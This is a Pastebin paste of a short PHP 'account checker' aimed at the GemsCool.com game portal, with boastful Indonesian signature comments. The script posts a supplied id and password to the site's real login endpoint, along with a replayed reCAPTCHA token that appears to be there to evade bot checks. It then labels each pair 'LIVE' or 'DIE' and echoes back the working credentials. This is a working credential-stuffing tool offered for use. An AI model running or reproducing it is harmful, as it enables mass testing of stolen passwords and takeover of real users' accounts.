cdfteller

ChecKER GemsCOOL.COM

Feb 3rd, 2019
290
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.84 KB | None | 0 0
  1. <?php
  2. // ChecKER GemsCool.com
  3.     // ./Miss Queen
  4.         // L @ T
  5.             // ^_* <~
  6.                 // PowereD bY HmmK
  7.                     // JncKeR
  8.                         // IndoNesia PaNaS.
  9.                             // IndoMareT DinGiN
  10.                         // Sponsor bY H3h3
  11.                     //  Di DuKunG olEH Sang Maha Pencipta
  12.                 // 100% GraTiS
  13.             // 100% No LoG
  14.         // TiDaK aDa unSuR keKeRasaN
  15.     // Konten 14+
  16. // Bhhhh
  17.  
  18. date_default_timezone_set("Asia/Jakarta");
  19. error_reporting(0);
  20.  
  21.     $gm = new gm();
  22.     echo $gm->check($_GET['id'], $_GET['pass']);
  23.    
  24.     class gm{
  25.     public function check($id, $pass){
  26.  
  27.         $ch = curl_init();
  28.         curl_setopt($ch, CURLOPT_URL, 'https://account.gemscool.com/member/login.php');
  29.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  30.         curl_setopt($ch, CURLOPT_POSTFIELDS, "returnURL=https%3A%2F%2Fwww.gemscool.com%2Findex.php%2F&svcCd=WEB&type=PL&fc=&loginURL=https%3A%2F%2Fwww.gemscool.com%2Flogin%2Flogin.php&ip=127.0.0.1&id=$id&password=$pass&g-recaptcha-response=03AF6jDqXaN5ca87lKIOooUA7xgscv0DUP_KkdTQtcSFbgJZiIIveQpa59KGczL-KMBjtsBc0RER-UExLlWpzZf8vnEdt67YKeNCvURWxlQJYwd7Feidvx-nO3LIJLjGIWw3QtuIhrvQnbcmD2Pq4KBf-hKZ2c5xuA590FQU5vkiYa0c11FMnofkmFd6SUaguH-KpuMWMSjUPTJpXgIXICosTde5QongYGYrLWb3vGmQfkoICjk4zg3K1apNyqNvSMNT-BB_dLs-oCRriIjgMrfWhdyBOYu7cF0VJFRmjvPbjYq9rpWcVQMeY-zeS0ltPQUfpLQ9L5a3OG");
  31.         curl_setopt($ch, CURLOPT_POST, 1);
  32.         $headers = array();
  33.         $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  34.         curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  35.         $result = curl_exec($ch);
  36.         //echo $result;
  37.        
  38.         if(stristr($result, 'https://www.gemscool.com/index.php/')) {
  39.         $hasilcuk['msg'] = "LIVE";
  40.         $hasilcuk['Id'] = "$id";
  41.         $hasilcuk['Pass'] = "$pass";
  42.         $hasilcuk['ACC'] = "[GemsCool.com]";
  43.         $hasilcuk['ChecKER'] = "./Miss Queen";
  44.         } else {
  45.         $hasilcuk['msg'] = "DIE";
  46.         }
  47.        
  48.         print "<pre>";
  49.         $output_json = json_encode($hasilcuk);
  50.         return $output_json;
  51.         print "</pre>";
  52.        
  53.     }
  54. }
  55. ?>
Advertisement
Add Comment
Please, Sign In to add comment